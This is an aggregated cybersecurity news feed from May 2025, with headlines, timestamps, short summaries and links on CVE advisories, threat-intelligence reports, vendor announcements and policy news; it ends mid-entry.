https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/a-low-cost-high-tech-solution-to-save-crops.html
Celebrating 40 Years of Innovation
2025-05-20T12:00:00Z | 1747742400

Explore the digital version of our iconic anniversary exhibit from Cisco Live EMEA. Journey through 40 years of innovation to see how the network has evolved and how Cisco is securely powering AI at scale. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/celebrating-40-years-of-innovation.html
Celebrating 40 Years of Innovation
2025-05-20T12:00:00Z | 1747742400

Explore the digital version of our iconic anniversary exhibit from Cisco Live EMEA. Journey through 40 years of innovation to see how the network has evolved and how Cisco is securely powering AI at scale. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/celebrating-40-years-of-innovation.html
Latest Security Advisory Highlights Critical Vulnerabilities Impacting Ivanti, MDaemon, Zimbra, and More
2025-05-20T11:25:55Z | 1747740355

Multiple vulnerabilities have been detected in widely used software and systems, specifically in Ivanti Endpoint Manager Mobile (EPMM), MDaemon Email Server, Srimax Output Messenger, Synacor Zimbra Collaboration Suite (ZCS), and ZKTeco BioTime. A new advisory by the Cybersecurity and Infrastructure Security Agency (CISA) highlights these vulnerabilities, which were identified through the Common Vulnerabilities and Exposures (CVE) naming system and assigned severity levels via the Common Vulnerability Scoring System (CVSS). The CVEs listed in this advisory have been linked to several critical, high, and medium-risk vulnerabilities, with new patches available to address these flaws. Below is a detailed look at the specific CVEs listed by CISA. Details of the Vulnerabilities Ivanti Endpoint Manager Mobile Vulnerabilities (CVE-2025-4427 & CVE-2025-4428) Ivanti has released updates to address two vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM) version 12.5.0.0, an organization-use platform for managing mobile devices. CVE-2025-4427 (Authentication Bypass) allows attackers to gain unauthorized access to protected resources without needing proper credentials. This vulnerability, rated as medium severity with a CVSS score of 5.3, can be exploited through the API of vulnerable systems. CVE-2025-4428 (Remote Code Execution) is a high-severity vulnerability with a CVSS score of 7.2. It enables attackers to execute arbitrary code on the target system by sending specially crafted API requests. Both vulnerabilities were discovered and disclosed on May 13, 2025, by Ivanti, who confirmed that a small number of customers had been impacted at the time of disclosure. Ivanti has provided mitigation guidance for both vulnerabilities. The company recommends using the built-in Portal ACLs functionality or an external Web Application Firewall (WAF) to filter access to the API and reduce the risk of exploitation. In cases where further assistance is needed, Ivanti offers an RPM file for customers, which can be installed by following a detailed guide. MDaemon Email Server (CVE-2024-11182) A cross-site scripting (XSS) vulnerability has been discovered in versions of MDaemon Email Server prior to 24.5.1c. Identified as CVE-2024-11182, this vulnerability, with a medium severity CVSS score of 5.3, allows an attacker to inject malicious JavaScript into email messages. When users interact with these emails, the malicious code executes in the context of their browser, potentially leading to unauthorized access or data leakage. Notably, this vulnerability has been exploited in cyber-espionage campaigns, with the Russian state-sponsored group APT28 leveraging it as part of their Operation Round Press. This highlights the real-world threat posed by this flaw. Organizations using MDaemon Email Server are urged to apply the patch available for version 24.5.1c to prevent potential exploitation. Srimax Output Messenger (CVE-2025-27920) A directory traversal vulnerability, CVE-2025-27920, has been discovered in Srimax Output Messenger versions prior to 2.0.63. This vulnerability, rated high with a CVSS score of 7.2, allows attackers to access sensitive files outside the intended directory by exploiting improper file path handling. The flaw has been actively exploited by the Turkish-affiliated threat group Marbled Dust since April 2024. The group has targeted entities associated with the Kurdish military in Iraq, using the vulnerability to deliver malicious payloads and exfiltrate sensitive data. Organizations using vulnerable versions of Output Messenger are strongly advised to update to version 2.0.63 or later to mitigate this risk. Synacor Zimbra Collaboration Suite (CVE-2024-27443) Zimbra Collaboration Suite (ZCS) versions 9.0 and 10.0 are vulnerable to a cross-site scripting (XSS) issue identified as CVE-2024-27443. The flaw, with a CVSS score of 6.1, lies in the CalendarInvite feature of the webmail interface. Attackers can exploit this vulnerability by embedding a crafted calendar header containing malicious JavaScript in an email. The header will then execute when the recipient views the message in Zimbra's classic webmail interface. Like the MDaemon Email Server vulnerability, CVE-2024-27443 has been exploited by APT28 in the same cyber-espionage campaign. ZKTeco BioTime (CVE-2023-38950) ZKTeco BioTime v8.5.5 contains a path traversal vulnerability, CVE-2023-38950, that allows unauthenticated attackers to read arbitrary files by sending a specially crafted payload. This high-severity vulnerability, with a CVSS score of 7.5, has been actively exploited by Iranian state-sponsored hackers targeting critical infrastructure in the Middle East. As with other vulnerabilities in this advisory, organizations using ZKTeco BioTime are advised to apply the available patches and use Cyble’s ODIN scanner to check whether their systems are internet-facing, which increases the risk of exploitation. Conclusion The vulnerabilities highlighted in this security advisory are not hypothetical—they are actively exploited in the wild. Featured in CISA’s Known Exploited Vulnerabilities (KEV) catalog, they demand immediate action to protect systems and data from potential breaches. Organizations should apply the latest patches to affected systems like Ivanti EPMM, MDaemon Email Server, Output Messenger, Zimbra, and ZKTeco BioTime, and utilize Cyble's ODIN scanner to check for exposed assets. References https://www.cisa.gov/news-events/alerts/2025/05/19/cisa-adds-six-known-exploited-vulnerabilities-catalog https://www.cve.org/CVERecord?id=CVE-2025-4427 https://www.cve.org/CVERecord?id=CVE-2025-4428 https://www.cve.org/CVERecord?id=CVE-2024-11182 https://www.cve.org/CVERecord?id=CVE-2025-27920 https://www.cve.org/CVERecord?id=CVE-2024-27443 https://www.cve.org/CVERecord?id=CVE-2023-38950 The post Latest Security Advisory Highlights Critical Vulnerabilities Impacting Ivanti, MDaemon, Zimbra, and More appeared first on Cyble.

https://cyble.com/blog/latest-security-vulnerabilities-ivanti/
CrowdStrike prepares for battle as Delta given go-ahead for outage lawsuit
2025-05-20T10:33:00Z | 1747737180

Delta Air Lines has been told it can take CrowdStrike to court to seek damages after last summer's outage forced the airline to cancel 7,000 flights.

https://www.itpro.com/security/crowdstrike-prepares-for-battle-as-delta-given-go-ahead-for-outage-lawsuit
No stone unturned: Trump creates opportunities in the US critical minerals sector
2025-05-20T10:18:28Z | 1747736308

President Donald Trump has made control of the critical minerals supply chain a key aspiration of the US economic and national security agenda. His administration is reshaping US minerals policy, expanding federal involvement, picking commercial winners, and opening new frontiers to exploration and extraction. S-RM Americas associate director Felix Cook examines the strategic implications and investment opportunities arising from Trump’s push for minerals domination.

https://www.s-rminform.com/latest-thinking/no-stone-unturned-trump-creates-opportunities-in-the-us-critical-minerals-sector
Duping Cloud Functions: An emerging serverless attack vector
2025-05-20T10:00:08Z | 1747735208

Cisco Talos built on Tenable’s discovery of a Google Cloud Platform vulnerability to uncover how attackers could exploit similar techniques across AWS and Azure.

https://blog.talosintelligence.com/duping-cloud-functions-an-emerging-serverless-attack-vector/
SEC Twitter hack: Man imprisoned for role in attack that caused Bitcoin’s price to soar.
2025-05-20T09:30:41Z | 1747733441

Eric Council Jr. pleaded guilty to charges related to the January 2024 hack of the US Securities and Exchange Commission's (SEC) Twitter account, which saw a fake announcement about the Bitcoin cryptocurrency posted to its followers. Read more in my article on the Hot for Security blog.

https://www.bitdefender.com/en-us/blog/hotforsecurity/sec-twitter-hack-bitcoins-price
Software Security Code of Practice - Assurance Principles and Claims (APCs)
2025-05-20T09:01:03Z | 1747731663

Helps vendors measure how well they meet the Software Security Code of Practice, and suggests remedial actions should they fall short.

https://www.ncsc.gov.uk/guidance/software-security-code-of-practice-assurance-principles-claims
Sophos Partners with Capsule on New Cyber Insurance Program
2025-05-20T07:55:59Z | 1747727759

The partnership rewards real-world, observable security controls, while removing the traditional barriers to insurance coverage.

https://news.sophos.com/en-us/2025/05/20/sophos-partners-with-capsule-on-new-cyber-insurance-program/
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) - 20/2025
2025-05-20T06:32:41Z | 1747722761

This week, we discuss safer maintenance practices for WordPress, a content management system that is also widely used in Finland. We also provide information on information-stealing malware and the EU’s vulnerability database.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-202025
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) - 20/2025
2025-05-20T06:32:41Z | 1747722761

This week, we discuss safer maintenance practices for WordPress, a content management system that is also widely used in Finland. We also provide information on information-stealing malware and the EU’s vulnerability database.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-202025
Decommissioning assets
2025-05-20T06:28:48Z | 1747722528

How to retire digital assets (such as data, software, or hardware) from operation.

https://www.ncsc.gov.uk/guidance/decommissioning-assets
Täna algab mobiiliga hääletamise avalik testimine
2025-05-20T06:05:38Z | 1747721138

Tänasest kuni neljapäevani viivad Riigi Infosüsteemi Amet (RIA) ja riigi valimisteenistus läbi telefonidele arendatud e-hääletamise rakenduse prototüübi avaliku testi, mis algab täna kell 9.00 ja lõpeb 22. mail kell 20.00. Valijarakenduse prototüübid iOS ja Androidi operatsioonisüsteemiga mobiilseadmetele on kättesaadavad valimised.ee lehel.

https://ria.ee/uudised/tana-algab-mobiiliga-haaletamise-avalik-testimine
ZDI-CAN-27101: Foxit
2025-05-20T05:00:00Z | 1747717200

A CVSS score 3.3 AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N severity vulnerability discovered by 'soiax' was reported to the affected vendor on: 2025-05-20, 17 days ago. The vendor is given until 2025-09-17 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
OPSWAT to Showcase Critical Infrastructure Protection Solutions at Vietnam Security Summit 2025
2025-05-20T02:50:00Z | 1747709400

OPSWAT is proud to participate and present at the Vietnam Security Summit 2025, taking place on May 23, 2025, in Ho Chi Minh City.

https://www.opswat.com/blog/opswat-to-showcase-critical-infrastructure-protection-solutions-at-vietnam-security-summit-2025
How Networking Improves Your Cybersecurity Posture
2025-05-20T01:00:40Z | 1747702840

Traditionally, networking and security have operated as separate silos within enterprise IT. Networking was focused on providing connectivity, while security was tasked with protecting that connectivity. The post How Networking Improves Your Cybersecurity Posture first appeared on The Versa Networks Blog.

https://versa-networks.com/blog/how-networking-improves-your-cybersecurity-posture/
Rate My Rizz
2025-05-20T00:00:00Z | 1747699200

RSA is always a good opportunity to reconnect with industry friends2025 was no exception. Beneath the marketing avalanche of AI-enabled everything, one theme stuck out in conversations with CISOs and defensive leaders: the mounting time and energy spent on cyber audits, reporting, and remediation.These Enterprise Risk Management (ERM) and Governance, Risk, and Compliance (GRC) efforts are especially demanding in regulated industries. But with mandates like NIS2 and DORA taking effect in Europeand domestic frameworks like SOX, SOC2, and CMMC still in playsecurity leaders are spending more time with audit committees than ever before.Compliance Theater: Starring the Risk RegisterIn enterprises, defensive resource allocations are often adjudicated by committees and measured by audit progress and the almighty risk register. This means most of the attention (and budget) aligns with avoiding one specific risk: legal or compliance failure (LCF). Its no surprise that CISOs are often left with a single 15-minute slot each year to brief the board on the other four cyber risk impacts. Thats a missed opportunity.Board presentation produced by ChatGPT 4o.Boards need to better understand cyber risk beyond compliance. The state of rizz (resilience) depends on more than audit checklists. Point-in-time audits work well for demonstrating regulatory due diligence. If something goes wrong, but the virtual paperwork shows that policies were followed and corrections made, enforcement actions can often be minimized or avoided.Thats not true for the other risk impactsoperational disruption, financial fraud, brand impairment, and competitive disadvantage. Even after clean audits, the residual risk across these domains remains. Boards need to grasp this difference. And CISOs must continue translating technical risk into business language that supports resilience conversations.Measuring Rizz: Easier Said Than SustainedCommunicating rizz is momentary. Measuring it is constant. Organizations spend heavily to prevent all five impacts, but security investments tied to non-compliance impacts often receive less scrutiny (ROSI). Thats where control validation comes in.Sankey diagram depicting threat categories leading to multiple possible risk impacts. Code produced with ChatGPT o3 and Claude-3.7-sonnet.Looking ahead (meaning, likely six months from now), AI agents will monitor and challenge other AI agents in continuous loops of control testing and remediation, especially as adversary TTPs evolve daily.The Automation Angle: Purple Teams and Silver BulletsUntil then, automation in purple teaming, breach and attack simulation (BAS), and exposure validation is the best way to scale defenses without burning out staff.A growing number of vendors (like Picus) offer automated testing platforms with user-friendly workflows. These platforms arent silver bullets, but they help CISOs tell a better executive story.A silver bullet produced by ChatGPT 4o.Consider Business Email Compromise (BEC). GRC will enforce controls like phishing simulations and financial separation of duties to satisfy LCF (Limit Control Frameworks) requirements. But if the CISO is also emulating attacks and testing the actual tech stackemail gateways, MFA, IAM policiesthe story becomes richer. It shows intentional, tested resilience across financial fraud risk, not just paper compliance. Its far more compelling than: We have an EDR as prescribed in our compliance framework.Real Rizz Moves: How Live Threat Emulation Beats Paper PromisesTo make this real, draw from live TTPs observed in the wild. For example, within the past 90 days (as of May 14, 2025), Recorded Futures AI Insights flagged dozens of events that could be used as fuel for BAS automation.GitHub user winsecurity published AMSI-Bypass-HWBP, a lightweight debugger tool in Rust designed to evade Windows Antimalware Scan Interface (AMSI) detection.ANY.RUN detailed a new information stealer called Zhong Stealer that targets the cryptocurrency and fintech sectors through social engineering tactics involving chat support systems.@siri_urz shared a sample of DieStealer, indicating its capabilities of credential access and spyware functions.Reports from Hunt.io indicated an intrusion campaign targeting South Korean organizations using Cobalt Strike Cat modified for exploitative purposes.Kalman reported on a privilege escalation technique in GCP using IAM Conditions linked to tagBindings.Check Point Research detailed a spearphishing campaign by APT29 utilizing GRAPELOADER malware against European diplomatic entities.Insikt Group noted the discovery of CVE-2021-42013 scanning activities with overlaps found from Alibaba Cloud ISPs.Quarkslab reported CVE-2025-24200 as an authorization bypass vulnerability in iOS and iPadOS, allowing physical access to disable USB Restricted Mode before Apple patched it.Trend Micro highlighted EncryptHub's reliance on MSC EvilTwin loader exploiting CVE-2025-26633 as part of their custom malware arsenal.IBM X-Force detailed a fileless lateral movement technique exploiting COM objects in Windows systems.@tangent65536 shared Mimikatz binaries signed with legitimate certificates online.Cato Networks reported the Ballista IoT botnet targeting TP-Link routers.Coral Jasmine presented the LethalVoid RAT using malicious exfiltration methods via Discord webhooks and FTP.ThreatFabric identified Crocodilus Android banking trojan targeting financial institutions.Microsofts Threat Intelligence Center documented Storm-2460 ransomwares introduction of PipeMagic malware exploiting CVE-2025-29824.Morphisec Labs exposed new delivery techniques for ValleyRAT through phishing tactics.Risk Registers Win Audits. Rizz Wins Crises.If the board only sees traffic light audit checkmarks, theyre missing the real color of cyber risk. Thats why rizz narratives must move beyond compliance and into control validation and business risk translationbefore the next threat does it for you.The rizz game show produced by ChaptGPT 4o.

https://www.recordedfuture.com/blog/rate-my-rizz
Consulta pública: versão preliminar do Esquema de Certificação de Serviços de Cibersegurança
2025-05-20T00:00:00Z | 1747699200

Está disponível para consulta pública, até 30 de maio de 2025, a versão preliminar do Esquema de Certificação de Serviços de Cibersegurança, que visa responder à necessidade da identificação e valorização de serviços de cibersegurança cujo desempenho passa a ser alvo de avaliação e monitorização periódica. Este esquema de certificação vai permitir a elaboração de um catálogo de prestadores de serviços de cibersegurança nacionais confiáveis, que respondam à atual procura, quer a nível nacional, quer a nível internacional, elevando a reputação das organizações nacionais e facilitando a sua integração nos mercados europeu e internacional, da prestação de serviços de cibersegurança.  A versão preliminar, produzida pelo Centro Nacional de Cibersegurança (CNCS), está alinhada com as principais normas internacionais nesta matéria, bem como com os esquemas de certificação em desenvolvimento no contexto do Enquadramento Europeu para a Certificação da Cibersegurança. Esta consulta pública, disponível online, apresenta o Esquema de Certificação de Serviços de Cibersegurança, incluindo os requisitos gerais, obrigatórios e horizontais para todas as certificações de serviços de cibersegurança, bem como os requisitos específicos definidos para cada tipo de serviço que o Esquema inclui à data, e tem como objetivo a recolha de contributos com vista ao seu aperfeiçoamento. Destinatários preferenciais da consulta pública Organizações que prestem serviços de cibersegurança Organismos de Certificação (OC) Auditores Profissionais de cibersegurança Clientes de serviços de cibersegurança. Mais informações na área dedicada à consulta pública.

https://dyn.cncs.gov.pt/pt/detalhe/art/135929/consulta-publica-versao-preliminar-do-esquema-de-certificacao-de-servicos-de-ciberseguranca
Centro Europeu de Competências em Cibersegurança aprova Programa de Trabalho 2025-2027
2025-05-20T00:00:00Z | 1747699200

O Centro Europeu de Competências em Cibersegurança (ECCC) aprovou o seu Programa de Trabalho para o período de 2025-2027, no âmbito do Programa Europa Digital, que prevê um investimento total de 390 milhões de euros em projetos estratégicos no domínio da cibersegurança.Este novo plano de ação visa reforçar as capacidades europeias em áreas-chave da cibersegurança, com destaque para o desenvolvimento de tecnologias emergentes, tais como a Inteligência Artificial e a criptografia pós-quântica. O programa vai dar, também, especial destaque à implementação de legislação europeia fundamental, nomeadamente o Regulamento de Cibersolidariedade, a Diretiva NIS 2 e o Regulamento de Ciber-Resiliência.Com este financiamento, a União Europeia reforça o seu compromisso com uma infraestrutura digital mais segura, resiliente e preparada para os desafios tecnológicos do futuro. Os projetos abrangidos vão apoiar, tanto o setor público como o privado, promovendo a cooperação entre Estados-Membros e o desenvolvimento de um verdadeiro ecossistema europeu de cibersegurança.Consulte o Programa de Trabalho 2025-2027.

https://dyn.cncs.gov.pt/pt/detalhe/art/135928/centro-europeu-de-competencias-em-ciberseguranca-aprova-programa-de-trabalho-2025-2027
Changing the Cybersecurity Narrative in K–12
2025-05-19T21:23:14Z | 1747689794

The post Changing the Cybersecurity Narrative in K–12 appeared first on iboss.

https://www.iboss.com/blog/changing-the-cybersecurity-narrative-in-k12/
Changing the Cybersecurity Narrative in K–12
2025-05-19T21:23:14Z | 1747689794

The post Changing the Cybersecurity Narrative in K–12 appeared first on iboss.

https://www.iboss.com/blog/changing-the-cybersecurity-narrative-in-k12/
Neo BPO reduce el ausentismo y la rotación con el Verint Interviewing Bot
2025-05-19T20:29:16Z | 1747686556

Descubra cómo Verint Bot ayuda a Neo BPO a mejorar la automatización de la CX y a obtener resultados concretos, incluida una reducción del 29 % en la rotación. The post Neo BPO reduce el ausentismo y la rotación con el Verint Interviewing Bot appeared first on Verint.

https://www.verint.com/resources/neo-bpo-reduce-el-ausentismo-y-la-rotacion-con-el-verint-interviewing-bot/
Con Verint, Claro Brasil mejora las conversiones de ventas, y aumenta el Net Promoter Score (NPS)
2025-05-19T20:23:14Z | 1747686194

Descubra cómo, con la solución de análisis empresarial impulsada por inteligencia artificial Da Vinci de Verint, Claro ha transformado su forma de hacer negocios. The post Con Verint, Claro Brasil mejora las conversiones de ventas, y aumenta el Net Promoter Score (NPS) appeared first on Verint.

https://www.verint.com/resources/con-verint-claro-brasil-mejora-las-conversiones-de-ventas-y-aumenta-el-net-promoter-score-nps/
Bradesco Seguros mejora la experiencia del cliente y reduce costos con Verint
2025-05-19T20:15:17Z | 1747685717

Descubra cómo Bradesco logró un aumento interanual de 9 puntos en NPS y redujo las quejas relacionadas con productos en un 55 % con Verint Speech Analytics y Verint Quality Bot. The post Bradesco Seguros mejora la experiencia del cliente y reduce costos con Verint appeared first on Verint.

https://www.verint.com/resources/bradesco-seguros-mejora-la-experiencia-del-cliente-y-reduce-costos-con-verint/
Hillstone AX-Series: Application Delivery Controller (ADC)
2025-05-19T20:00:00Z | 1747684800

Hillstone AX Series Application Delivery Controllers (ADCs) are the next generation of enterprise-class application delivery optimization products. The Hillstone ADC supports a full range of load balancing functions, including link load balancing (LLB), server load balancing (SLB) and global server load balancing (GSLB). In addition, the AX Series supports health checks for applications, servers and […] The post Hillstone AX-Series: Application Delivery Controller (ADC) appeared first on Hillstone Networks.

https://www.hillstonenet.com/more/resources/hillstone-ax-series-application-delivery-controller-adc/
Inside the LockBit Leak: Rare Insights Into Their Operations
2025-05-19T17:51:52Z | 1747677112

In this post, we delve into the significant data breach affecting the LockBit ransomware group. This leak provides a rare opportunity for security defenders to gain critical insights into LockBit's operations. The post Inside the LockBit Leak: Rare Insights Into Their Operations appeared first on Flashpoint.

https://flashpoint.io/blog/inside-the-lockbit-leak/
The who, where, and how of APT attacks in Q4 2024–Q1 2025
2025-05-19T17:17:43Z | 1747675063

ESET Chief Security Evangelist Tony Anscombe highlights key findings from the latest issue of the ESET APT Activity Report

https://www.welivesecurity.com/en/videos/who-where-how-apt-attacks-q4-2024-q1-2025/
Moving Your Access Management Platform to the Cloud?
2025-05-19T15:00:00Z | 1747666800

Part 1 of 2: Avoid pitfalls and unlock the full power of your cloud infrastructure

https://www.security.com/product-insights/moving-your-access-management-platform-cloud
Proactive Protection Through ThreatSTOP’s Feedback Loop
2025-05-19T14:16:09Z | 1747664169

At ThreatSTOP, proactive protection isn’t just a buzzword—it’s core to how we safeguard our customers’ digital environments. A prime example of this approach is our “Feedback Loop” process, a dynamic and intelligent method employed by our Security, Intelligence, and Research team to ensure continuous, evolving protections against emerging threats.

https://www.threatstop.com/blog/proactive-protection-through-threatstops-feedback-loop
NHS England launches cyber charter to shore up vendor security practices
2025-05-19T14:08:58Z | 1747663738

Voluntary charter follows a series of high-profile ransomware attacks

https://www.itpro.com/security/nhs-england-launches-cyber-charter-to-shore-up-vendor-security-practices
The Rise of Identity-Based Attacks and How Deception Can Help
2025-05-19T13:59:35Z | 1747663175

Identity-based attacks are rising fast. Discover how deception technology, like Fidelis Active Directory Intercept™, detects and derails attackers before they escalate. The post The Rise of Identity-Based Attacks and How Deception Can Help appeared first on Fidelis Security.

https://fidelissecurity.com/threatgeek/cyberattacks/identity-based-attacks-and-deception/
SolarWinds security chief on the risks and rewards of being a CISO
2025-05-19T13:13:44Z | 1747660424

At the RSA Conference in San Francisco this year, Tim Brown talked about the protection CISOs need, Russia’s continued attempts to launch attacks and how companies can navigate the treacherous waters of cyber incidents.

https://therecord.media/solarwinds-security-chief-tim-brown-interview
SolarWinds security chief on the risks and rewards of being a CISO
2025-05-19T13:13:44Z | 1747660424

At the RSA Conference in San Francisco this year, Tim Brown talked about the protection CISOs need, Russia’s continued attempts to launch attacks and how companies can navigate the treacherous waters of cyber incidents.

https://therecord.media/solarwinds-security-chief-tim-brown-interview
Compliance Insights: How to Stop Lateral Movement and Boost Authorization
2025-05-19T13:00:00Z | 1747659600

Stop lateral movement before it starts. Learn how to meet security compliance regulations with layered security, microsegmentation, and smart API protection.

https://www.akamai.com/blog/security/2025/may/compliance-insights-stop-lateral-movement-boost-authorization
Hidden Gems: Harnessing the Power of the Network to Proactively Ensure Edge Success
2025-05-19T13:00:00Z | 1747659600

There is no doubt that where people perform their jobs has received a great deal of attention over the last five years. Certainly, the focus initially was driven by the COVID pandemic and the safety necessary for employees and customers during this challenging period. Among the many adjustments of the time was to...

https://www.netscout.com/blog/hidden-gems-harnessing-power-network-proactively-ensure-edge
Surging Without Slowing: How We Mastered Japan’s Golden Week Traffic Spike
2025-05-19T12:55:50Z | 1747659350

Introduction  Japan’s Golden Week is one of the most anticipated holiday seasons in the region, but for IT and network operations teams it’s a well-known pressure test. As businesses reopen after a full shutdown, millions of workers log in simultaneously at 9:00 AM local time, creating an intense and rapid traffic surge.  At Cato Networks,... The post Surging Without Slowing: How We Mastered Japan’s Golden Week Traffic Spike  appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-we-mastered-japans-golden-week-traffic-spike/
CC-4659 - Mozilla Releases Security Updates for Firefox and Firefox ESR
2025-05-19T12:36:00Z | 1747658160

Severity: Medium Mozilla releases security updates addressing two critical vulnerabilities that could lead to an out-of-bounds read or write on a JavaScript object Mozilla releases security updates addressing two critical vulnerabilities that could lead to an out-of-bounds read or write on a JavaScript object Updated: 19 May 2025

https://digital.nhs.uk/cyber-alerts/2025/cc-4659
Glasswing AI and ThreatSTOP Announce Strategic Partnership to Revolutionize Enterprise AI Vendor Management and Security
2025-05-19T12:34:33Z | 1747658073

SAN DIEGO, CA - May 12, 2025 - Glasswing AI, the leader in AI discovery and network-based AI security platforms and AI firewalls, today announced a dynamic partnership with ThreatSTOP, a global provider of advanced DNS-based security. Together they give enterprises a single, automated way to discover every AI service in use and immediately block anything that violates policy.  On-Premises, in the cloud, or for remote workers.

https://www.threatstop.com/blog/glasswing-ai-and-threatstop-announce-strategic-partnership-to-revolutionize-enterprise-ai-vendor-management-and-security
Neo BPO reduz o absenteísmo e a rotatividade com Verint Interviewing Bot
2025-05-19T12:32:11Z | 1747657931

Ouça como o Verint Interviewing Bot ajuda a empresa a atingir excelência em seu processo de triagem de candidatos e veja resultados tangíveis. The post Neo BPO reduz o absenteísmo e a rotatividade com Verint Interviewing Bot appeared first on Verint.

https://www.verint.com/resources/neo-bpo-reduz-o-absenteismo-e-a-rotatividade-com-verint-interviewing-bot/
Verint Interviewing Bot ajuda a Neo BPO a impulsionar o desempenho dos colaboradores
2025-05-19T12:27:59Z | 1747657679

Ouça como a Neo BPO Hypeone usa o Verint Interviewing Bot para alcançar excelência em seu processo de triagem de candidatos e gerar resultados concretos. The post Verint Interviewing Bot ajuda a Neo BPO a impulsionar o desempenho dos colaboradores appeared first on Verint.

https://www.verint.com/resources/verint-interviewing-bot-ajuda-a-neo-bpo-a-impulsionar-o-desempenho-dos-colaboradores/
Verint Interviewing Bot ajuda a Neo BPO a garantir as pessoas certas nas funções certas
2025-05-19T12:22:44Z | 1747657364

Ouça como o bot da Verint permite que a Neo BPO avalie os funcionários no presente e, ao mesmo tempo, obtenha insights sobre o potencial de carreira. The post Verint Interviewing Bot ajuda a Neo BPO a garantir as pessoas certas nas funções certas appeared first on Verint.

https://www.verint.com/resources/verint-interviewing-bot-ajuda-a-neo-bpo-a-garantir-as-pessoas-certas-nas-funcoes-certas/
Developing With Cisco XDR at Cisco Live San Diego ‘25
2025-05-19T12:00:23Z | 1747656023

Join us at Cisco Live San Diego to explore Cisco XDR’s latest innovations, including custom integrations, AI automation, and community features. Don’t miss out!

https://blogs.cisco.com/security/developing-with-cisco-xdr-at-cisco-live-san-diego-2025/
Cisco Secure AI Factory with NVIDIA
2025-05-19T12:00:00Z | 1747656000

AI is transforming industries. Build success with Cisco Secure AI Factory’s scalable, secure infrastructure to drive innovation, efficiency, and sustainability.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/cisco-secure-ai-factory-with-nvidia.html
Cisco Welcomes Chuck Graham as Chief Supply Chain Officer
2025-05-19T12:00:00Z | 1747656000

Chuck will oversee end-to-end supply chain operations, driving agility, innovation, and resilience across our global network.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/cisco-welcomes-chuck-graham-as-chief-supply-chain-officer.html
Cisco Secure AI Factory with NVIDIA
2025-05-19T12:00:00Z | 1747656000

AI is transforming industries. Build success with Cisco Secure AI Factory’s scalable, secure infrastructure to drive innovation, efficiency, and sustainability.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/cisco-secure-ai-factory-with-nvidia.html
Scope 3, Category 8: What Akamai Is Doing for Customer Reporting
2025-05-19T12:00:00Z | 1747656000

https://www.akamai.com/blog/sustainability/2025/may/what-akamai-Is-doing-for-customer-reporting
HackRF PortaPack H4M with Mayhem Firmware – A Powerful Handheld SDR Toolkit
2025-05-19T11:49:52Z | 1747655392

In the Q4 of 2024, a new SDR (Software Defined Radio) was released: the HackRF PortaPack H4M, shipping with the Mayhem firmware. Whether you’re a hobbyist, hacker, ham radio enthusiast, or security researcher, this compact device brings a full-featured radio lab to your pocket. In this blog, we’ll walk you through the essentials of the […] The post HackRF PortaPack H4M with Mayhem Firmware – A Powerful Handheld SDR Toolkit first appeared on Mobile Hacker.

https://www.mobile-hacker.com/2025/05/19/hackrf-portapack-h4m-with-mayhem-firmware-a-powerful-handheld-sdr-toolkit/
The AI Fix nominated for top podcast award. Vote now!
2025-05-19T11:02:44Z | 1747652564

Bloomin' eck! I'm delighted to share with you that "The AI Fix" is up for an award!

https://grahamcluley.com/the-ai-fix-nominated-for-top-podcast-award-vote-now/
The Week in Vulnerabilities: IT, ICS Fixes Prioritized by Cyble
2025-05-19T10:43:54Z | 1747651434

In reports to clients last week, Cyble analyzed over 60 IT and industrial control system (ICS) vulnerabilities to identify high-priority fixes for security teams. The vulnerabilities included 16 critical vulnerabilities and eight that were the target of exploits circulating on underground and dark web forums. From the list, Cyble researchers identified nine IT vulnerabilities that can lead to system compromise, data breaches, and high-priority ICS vulnerabilities in Pixmeo DICOM and Hitachi Energy products. Top IT Vulnerabilities These are the nine high-priority IT vulnerabilities identified by Cyble vulnerability intelligence researchers. CVE-2025-31324 is a 10.0-severity vulnerability affecting SAP NetWeaver's Visual Composer component, specifically the Metadata Uploader function. Attackers could potentially send specially crafted HTTP POST requests to a vulnerable endpoint, uploading malicious files (often JSP web shells) to directories accessible via the web server. Once uploaded, these web shells could allow attackers to execute arbitrary operating system commands, maintain access, and further compromise the SAP environment. The vulnerability has been actively exploited in the wild since at least late April 2025, with evidence of attacks targeting manufacturing and critical infrastructure sectors. Notably, Chinese nation-state threat actors have been linked to exploitation campaigns leveraging the vulnerability for espionage and persistent access, while recent reports indicate that the Russian ransomware group BianLian and the operators of the RansomEXX ransomware family have also been reported to exploit the flaw in their campaigns. CVE-2025-42999 is a 9.1-severty vulnerability in the SAP NetWeaver Visual Composer Metadata Uploader component. It is classified as an insecure deserialization flaw and could potentially be exploited by a privileged user to upload malicious or untrusted content to the vulnerable endpoint. CVE-2025-4427 and CVE-2025-4428 are medium- and high-severity vulnerabilities impacting Ivanti Endpoint Manager Mobile (EPMM), a comprehensive mobile device management (MDM) and endpoint security solution designed for enterprises to centrally manage and secure mobile devices, applications, and content across their organization. CVE-2025-4427 could allow attackers to access protected resources via the API without proper credentials, effectively bypassing authentication controls, while CVE-2025-4428 could allow remote attackers to execute arbitrary code on the server. Additionally, both flaws could be chained together, and successful exploitation could lead to unauthenticated remote code execution. CVE-2025-32756 is a 9.8-severity stack-based buffer overflow vulnerability (CWE-121) affecting multiple 